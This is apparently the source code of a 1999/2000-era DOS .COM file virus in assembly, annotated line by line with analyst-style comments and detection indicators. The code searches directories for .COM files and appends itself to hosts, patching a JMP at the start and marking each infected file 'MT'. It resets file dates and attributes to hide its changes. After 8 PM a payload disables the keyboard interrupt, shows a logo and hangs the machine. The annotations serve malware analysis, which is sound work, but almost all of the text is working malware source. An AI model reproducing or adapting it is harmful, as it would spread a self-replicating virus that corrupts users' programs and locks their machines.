; ***************************************************************************
; * written by cod in 1999/2000 ?
; ***************************************************************************
; Program setup and delta-offset computation (MASM/TASM syntax, 16-bit DOS .COM).
; The CALL pushes the run-time address of get_disp; subtracting the assembled
; OFFSET of get_disp leaves in BP the displacement between where the code was
; assembled and where it is actually running. Every later data and jump
; reference is formed as [ BP + label ], so the code runs at any load offset.
; Analyst note: a CALL to the very next instruction followed by reading the
; return address off the stack is a common marker of appended,
; position-independent code in a .COM file.
.MODEL TINY
.CODE
ORG 100h
start: CALL get_disp ; pushes the address of get_disp
get_disp: MOV AX, SS
MOV ES, AX
MOV BX, SP
MOV AX, WORD PTR [ ES : BX ] ; AX = word at SS:SP = return address from the CALL
MOV BP, AX
MOV AX, CS
MOV ES, AX ; ES = CS
XOR BX, BX
SUB SP, 2 ; SP is lowered by 2; the return address was read in place, not popped
SUB BP, OFFSET get_disp ; BP = run-time address - assembled address (0 when run unrelocated)
; Time-of-day trigger. INT 21h AH=2Ch returns the system time with the hour in CH.
; An hour of 20 or later branches to destruct, which jumps to happy_month;
; any earlier hour continues at save_path. The JE test is already covered by
; the JNB that follows the second, identical compare.
check_if_destruct: MOV AH, 02Ch ; DOS: get system time (CH = hour)
INT 21h
CMP CH, 20
JE destruct
CMP CH, 20
JNB destruct ; unsigned CH >= 20
LEA DI, [ BP + save_path ] ; jump target is computed through BP, then taken indirectly
JMP DI
destruct: LEA DI, [ BP + happy_month ]
JMP DI
; Save the caller's environment before the directory scan:
;   - current directory of the default drive -> org_path (64-byte buffer)
;   - offset of the current DTA -> old_dta_off
; then point the DTA at the private buffer that starts at dta_filler, so that
; find-first/find-next results land in the dta_* fields.
save_path: MOV AH, 47h ; DOS: get current directory into DS:SI
XOR DL, DL ; DL = 0 selects the default drive
LEA SI, [ BP + org_path ]
INT 21h
get_dta: MOV AH, 2Fh ; DOS: get DTA address, returned in ES:BX
INT 21h
MOV [ BP + old_dta_off ], BX ; only the offset is kept; the segment in ES is not saved
set_dta: MOV AH, 1Ah ; DOS: set DTA to DS:DX
LEA DX, [ BP + dta_filler ]
INT 21h
; Directory scan. Looks for files matching search_mask ('*.COM') with the
; attribute mask in search_attrib. Control flow as written:
;   find-first succeeds -> clear_attrib
;   find-first fails    -> falls through to find-next
;   find-next succeeds  -> clear_attrib
;   find-next fails     -> change to the parent directory ('..') and search again
;   chdir fails         -> bomb (the clean-up path that restores directory, DTA and host bytes)
; Behavioural indicator: repeated find-first/find-next for *.COM combined
; with walking upward through '..' until the change of directory fails.
search: ; Search for a file
find_first: MOV AH, 4Eh ; DOS: find first matching file
MOV CX, [ BP + search_attrib ]
LEA DX, [ BP + search_mask ]
INT 21h
JNC clear_attrib ; CF clear = a match is in the DTA
find_next: MOV AH, 4Fh ; DOS: find next matching file
INT 21h
JNC clear_attrib
still_searching: MOV AH, 3Bh ; DOS: change directory to DS:DX
LEA DX, [ BP + previous_dir ]
INT 21h
JNC search
LEA DI, [ BP + bomb ]
JMP DI
; Prepare the found file and filter out DOS system files.
; clear_attrib sets the file's attributes to 0 (removing read-only, hidden and
; system), so the file can later be opened for writing. The original
; attribute byte remains in dta_file_attrib.
; check_if_not_infected compares the name in the DTA against three fixed
; names: COMMAND.COM (11 bytes), IBMBIO.COM (10) and IBMDOS.COM (10). A match
; on any of them goes to close_file via go_next; otherwise control continues
; at check_if_infected. Despite the label, no infection marker is tested here.
; REPE CMPSB compares DS:SI with ES:DI, so both segment registers must
; address this code's segment - assumed, not established in this block.
clear_attrib: MOV AX, 4301h ; DOS: set file attributes
XOR CX, CX ; new attributes = none
LEA DX, [ BP + dta_file_name ]
INT 21h
XCHG BX, AX ; NOTE(review): purpose of moving AX into BX is not evident from the visible code
check_if_not_infected:
CLD ; string compares run forward
LEA DI, [ BP + command_com ]
LEA SI, [ BP + dta_file_name ]
MOV CX, 11 ; length of 'COMMAND.COM'
REPE CMPSB
JE go_next
LEA DI, [ BP + ibmbio_com ]
LEA SI, [ BP + dta_file_name ]
MOV CX, 10 ; length of 'IBMBIO.COM'
REPE CMPSB
JE go_next
LEA DI, [ BP + ibmdos_com ]
LEA SI, [ BP + dta_file_name ]
MOV CX, 10 ; length of 'IBMDOS.COM'
REPE CMPSB
JNE check_if_infected
go_next: LEA DI, [ BP + close_file ]
JMP DI
; Open the candidate file read/write and reject EXE-format files.
; On open failure, control goes to close_file. On success the handle is stored
; in handle_of_file, the file pointer is set to offset 0, and the first two
; bytes are read into last_chars. If they equal exe_id ('MZ') the file is
; skipped via go_to_next -> restore_date_time; otherwise control continues at
; com_valid.
check_if_infected: PUSH AX
PUSH BX
MOV AX, 3D02h ; DOS: open file, access mode 2 = read/write
LEA DX, [ BP + dta_file_name ]
INT 21h
JNC opened
POP BX
POP AX
MOV DI, BP ; overwritten by the LEA on the next line
LEA DI, [ BP + close_file ]
JMP DI
opened: MOV WORD PTR [ BP + handle_of_file ], AX ; AX = handle returned by the open call
POP BX
POP AX
XOR CX, CX
XOR DX, DX
MOV AX, 4200h ; DOS: seek from start of file, offset CX:DX = 0
MOV BX, WORD PTR [ BP + handle_of_file ]
INT 21h
MOV AH, 3Fh ; DOS: read CX bytes into DS:DX
MOV BX, WORD PTR [ BP + handle_of_file ]
MOV CX, 0002h
LEA DX, [ BP + last_chars ]
INT 21h
MOV AX, WORD PTR [ BP + last_chars ]
CMP AX, WORD PTR [ BP + exe_id ] ; 'MZ' header means EXE content behind a .COM name
JE go_to_next
JMP com_valid
go_to_next: LEA DI, [ BP + restore_date_time ]
JMP DI
; Infection-marker check. Seeks to (file size - 2), reads the last two bytes
; of the file into last_chars, and compares them byte by byte with virus_id
; ('MT'). If both bytes match, the file is treated as already modified and
; control goes to close_file; otherwise control continues at save_3_bytes.
; Only the low word of dta_file_size is used and the high word of the seek
; offset is forced to 0.
; Detection note: the same test - last two bytes of a .COM file equal to
; 'MT' - is the marker this code itself relies on.
com_valid: MOV DX, WORD PTR [ BP + dta_file_size ] ; low word of the size from the DTA
SUB DX, 2
MOV AX, 4200h ; DOS: seek from start of file to CX:DX
MOV BX, WORD PTR [ BP + handle_of_file ]
MOV CX, 0000h
INT 21h
MOV AH, 3Fh ; DOS: read 2 bytes
MOV BX, WORD PTR [ BP + handle_of_file ]
MOV CX, 0002h
LEA DX, [ BP + last_chars ]
INT 21h
MOV AH, [ BP + last_chars ]
CMP AH, [ BP + virus_id ] ; first marker byte
JNE save_3_bytes
MOV AH, [ BP + last_chars + 1 ]
CMP AH, [ BP + virus_id + 1 ] ; second marker byte
JNE save_3_bytes
LEA DI, [ BP + close_file ]
JMP DI
; File modification sequence (appending .COM infector). Steps as written:
;   save_3_bytes          - seek to offset 0 and read the host's first 3 bytes into _3_bytes
;   goto_eof              - seek to end of file; AX = low word of the file length
;   save_jmp_displacement - jmp_disp = length - 3, the rel16 operand of a near JMP
;                           placed at offset 0 that lands at the old end of file
;   write_code            - write virus_length bytes starting at start (code and data) at end of file
;   goto_baf              - seek back to offset 0
;   write_jmp             - overwrite the first 3 bytes with jmp_code (0E9h) + jmp_disp
; then increment the infections counter.
; None of the INT 21h calls in this block has its carry flag checked.
; Resulting on-disk indicators, all derivable from this file: the first byte
; is 0E9h, the file grows by virus_length bytes, and the last two bytes are
; 'MT' (virus_id is the final data item before EOV).
save_3_bytes: MOV AX, 4200h ; DOS: seek from start; BX presumably still holds the handle loaded in com_valid
XOR CX, CX
XOR DX, DX
INT 21h
MOV AH, 3Fh ; DOS: read 3 bytes
MOV BX, WORD PTR [ BP + handle_of_file ]
MOV CX, 0003h
LEA DX, [ BP + _3_bytes ]
INT 21h
goto_eof: MOV AX, 4202h ; DOS: seek relative to end of file, offset 0
MOV BX, WORD PTR [ BP + handle_of_file ]
XOR CX, CX
XOR DX, DX
INT 21h
save_jmp_displacement:
SUB AX, 0003h ; a near JMP is 3 bytes long, so the target is relative to offset 3
MOV [ BP + jmp_disp ], AX
write_code: MOV AH, 40h ; DOS: write CX bytes from DS:DX
MOV BX, WORD PTR [ BP + handle_of_file ]
MOV CX, virus_length
LEA DX, [ BP + start ]
INT 21h
goto_baf: MOV AX, 4200h ; DOS: seek to beginning of file
MOV BX, WORD PTR [ BP + handle_of_file ]
XOR CX, CX
XOR DX, DX
INT 21h
write_jmp: MOV AH, 40h ; DOS: write 3 bytes (jmp_code followed by jmp_disp)
MOV BX, WORD PTR [ BP + handle_of_file ]
MOV CX, 0003h
LEA DX, [ BP + jmp_code ]
INT 21h
INC [ BP + infections ]
; Per-file clean-up and loop control.
;   restore_date_time - set the file's time and date back to the values captured in the DTA
;   close_file        - close the handle stored in handle_of_file
;   restore_attrib    - set the attributes back to the byte captured in the DTA
;   done_infecting?   - when infections equals max_infections go to bomb
;                       (clean-up and return to host); otherwise continue at find_next
;   return_control    - jump to offset 100h, the entry point of the .COM image
; Forensic note: because the timestamp and attributes are written back, file
; date/time and attribute bits are not reliable evidence of modification
; here; compare file size and content instead.
restore_date_time: MOV AX, 5701h ; DOS: set file date/time; BX is presumably still the open handle
MOV CX, [ BP + dta_file_time ]
MOV DX, [ BP + dta_file_date ]
INT 21h
close_file: MOV AH, 3Eh ; DOS: close handle in BX
MOV BX, [ BP + handle_of_file ]
INT 21h
restore_attrib: XOR CH, CH
MOV CL, [ BP + dta_file_attrib ] ; CX = original attribute byte, zero-extended
MOV AX, 4301h ; DOS: set file attributes
LEA DX, [ BP + dta_file_name ]
INT 21h
done_infecting?: MOV AH, [ BP + infections ]
CMP AH, [ BP + max_infections ]
JZ bomb
LEA DI, [ BP + find_next ]
JMP DI
return_control: MOV DI, 100h ; start of the host program image
JMP DI
; Environment restore and hand-back to the host. Despite the label name, the
; visible code here only undoes the earlier changes:
;   restore_path    - change to the root directory, then to the path saved in org_path
;                     (INT 21h AH=47h returns the path without a leading backslash)
;   restore_dta     - set the DTA offset back to old_dta_off
;   restore_3_bytes - copy the 3 saved host bytes from _3_bytes to offset 100h in memory
;   return_control_or_exit - BP == 0 means the code runs at its assembled
;                     offsets (no host in front of it), so it terminates via
;                     INT 21h AX=4C00h; otherwise it jumps to return_control,
;                     which transfers to offset 100h.
bomb:
restore_path: MOV AH, 3Bh ; DOS: change directory
LEA DX, [ BP + root ]
INT 21h
MOV AH, 3Bh
LEA DX, [ BP + org_path ]
INT 21h
restore_dta: MOV AH, 1Ah ; DOS: set DTA to DS:DX
MOV DX, [ BP + old_dta_off ]
INT 21h
restore_3_bytes: LEA SI, [ BP + _3_bytes ]
MOV DI, 100h
CLD
MOV CX, 0003h
REP MOVSB ; copies DS:SI -> ES:DI, 3 bytes
return_control_or_exit:
CMP BP, 0000h
JE exit
LEA DI, [ BP + return_control ]
JMP DI
exit: MOV AX, 4C00h ; DOS: terminate process, return code 0
INT 21h
; Payload, reached from destruct when the hour check at check_if_destruct
; reports 20 or later. Steps visible here:
;   1. If is_encrypt is non-zero, loop bad_routine_length times starting at
;      execute_now, loading each byte into AL and subtracting is_encrypt.
;      No store back to memory appears in the loop.
;   2. With interrupts disabled, write two words into the interrupt vector
;      table slot of INT 09h (keyboard hardware interrupt) at 0000:0024h.
;   3. Set video mode 3 (80x25 text) and copy 160 words from logo to
;      B800:0000, the colour text buffer (character/attribute byte pairs).
;   4. Spin forever at current_location; the environment is not restored and
;      control is never returned to the host on this path.
; The five bytes at reset_cpu encode a far jump to F000:FFF0; they sit after
; the endless loop and no visible instruction transfers control to them.
; Lock_Int_09 is a handler consisting of a single IRET.
happy_month: CMP [CS:is_encrypt], 00h
JE execute_now
execute_wait: MOV CX, bad_routine_length ; loop count (see the EQU at the end of the file)
MOV AX, CS
MOV ES, AX
LEA DI, [ BP + execute_now ]
repeat_loop: MOV AL, BYTE PTR [ ES : DI ]
SUB AL, [CS:is_encrypt]
INC DI
LOOP repeat_loop
execute_now: CLI ; no interrupts while the vector table is modified
XOR AX, AX
MOV ES, AX ; ES = 0000h, segment of the interrupt vector table
MOV BX, 09h * 4 ; BX = 24h, slot of INT 09h
LEA DI, [ BP + Lock_Int_09 ]
MOV DX, DI
ADD BX, 2
MOV [ ES : BX ], DX ; word at 0000:0026h = address of Lock_Int_09
SUB BX, 2
MOV DX, CS
MOV [ ES : BX ], DX ; word at 0000:0024h = CS
STI
MOV AX, CS
MOV DS, AX
MOV AX, 0003h ; BIOS video: AH=00h set mode, AL=03h
INT 10h
MOV AX, 0B800h
MOV ES, AX
XOR DI, DI
MOV AX, CS
MOV DS, AX
LEA SI, [ BP + logo ]
MOV CX, 20 * 8 ; 160 words = 320 bytes
REP MOVSW
current_location: NOP
JMP current_location ; endless loop
reset_cpu DB 0EAh, 0F0h, 0FFh, 00h, 0F0h
execute_stop: NOP
Lock_Int_09: IRET
; Data area. It is part of the range start..EOV, so it is written out together
; with the code by write_code (virus_length bytes).
; Static indicators that can be read directly from these declarations:
;   - the strings '*.COM', 'COMMAND.COM', 'IBMBIO.COM', 'IBMDOS.COM'
;   - the two-byte marker 'MT' as the last bytes before EOV, hence the last
;     bytes of any file that write_code has appended to
;   - a 0E9h byte followed by a 16-bit displacement as the 3-byte file prefix
old_dta_off DW ? ; offset of the DTA that was active on entry
; dta_filler .. dta_file_name: 43-byte private DTA filled by find-first/find-next
dta_filler DB 21 dup ( ? ) ; reserved area used by DOS for the search state
dta_file_attrib DB ? ; attribute byte of the matched file
dta_file_time DW ? ; packed time of the matched file
dta_file_date DW ? ; packed date of the matched file
dta_file_size DD ? ; file size; only the low word is read by com_valid
dta_file_name DB 13 dup ( ? ) ; ASCIIZ 8.3 name of the matched file
is_encrypt DB ? ; tested and subtracted in the loop at happy_month
search_mask DB '*.COM', 0
search_attrib DW 00100111b ; bits set: 0 read-only, 1 hidden, 2 system, 5 archive
command_com DB 'COMMAND.COM' ; names compared in check_if_not_infected (no terminator stored)
ibmbio_com DB 'IBMBIO.COM'
ibmdos_com DB 'IBMDOS.COM'
previous_dir DB '..', 0
root DB '\', 0
org_path DB 64 DUP ( ? ) ; current directory saved at save_path
infections DB ? ; incremented after each write_jmp
max_infections DB 1 ; compared with infections at done_infecting?
handle_of_file DW ? ; DOS handle of the file being processed
logo Db 'ascii text encoded with text mode attributes.. 4 bit for color and 4 bit for background!$', 00h
_3_bytes DB 0, 0, 0 ; first 3 bytes of the host, saved before they are overwritten
exe_id DB 'MZ' ; EXE header signature; files starting with it are skipped
jmp_code DB 0E9h ; opcode of near JMP rel16; written together with jmp_disp
jmp_disp DW ?
last_chars DB 0, 0 ; 2-byte scratch buffer for the header and trailer reads
virus_id DB 'MT' ; marker tested by com_valid
EOV:
virus_length EQU OFFSET EOV - OFFSET start ; bytes from start to EOV, code and data
bad_routine_length EQU OFFSET execute_now - OFFSET execute_stop ; note operand order: execute_now precedes execute_stop in the file
END start